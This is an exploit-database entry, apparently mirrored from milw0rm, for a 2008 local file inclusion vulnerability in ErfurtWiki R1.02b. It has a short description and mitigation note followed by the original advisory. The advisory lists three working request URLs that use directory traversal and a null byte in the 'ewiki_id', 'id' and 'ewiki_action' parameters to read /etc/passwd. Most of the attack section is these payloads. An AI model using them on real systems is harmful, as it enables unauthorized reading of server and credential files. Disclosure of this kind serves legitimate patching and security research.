header-logo
Suggest Exploit
vendor:
ErfurtWiki
by:
unohope
7.5
CVSS
HIGH
Local File Inclusion
94
CWE
Product Name: ErfurtWiki
Affected Version From: R1.02b
Affected Version To: R1.02b
Patch Exists: Yes
Related CWE: N/A
CPE: a:erfurtwiki:erfurtwiki:1.02b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerability

ErfurtWiki is vulnerable to local file inclusion. An attacker can exploit this vulnerability to include local files on the web server. This can be exploited to view sensitive files on the web server, such as the /etc/passwd file. The vulnerability is due to the 'ewiki_id' parameter in the 'css.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by supplying a malicious 'ewiki_id' parameter value in a GET request to the 'css.php' script. This can be exploited to include local files on the web server, such as the '/etc/passwd' file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ErfurtWiki.
Source

Exploit-DB raw data:

  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerability

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: ErfurtWiki

Download ====:: http://erfurtwiki.sourceforge.net/downloads/ewiki-R1.02b.tgz

Mirror ======:: http://www.badongo.com/file/9611291

______________________
[Local File Inclusion]

- {css.php} -

http://localhost/ewiki/fragments/css.php?ewiki_id=../../../../../../../../etc/passwd%00&ewiki_action=1

http://localhost/ewiki/?id=../../../../../../../../../../../../etc/passwd%00

http://localhost/ewiki/fragments/css.php?ewiki_id=1&ewiki_action=../../../../../../../../etc/passwd%00

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]

Navigation

Suggest Exploit

Services By CQR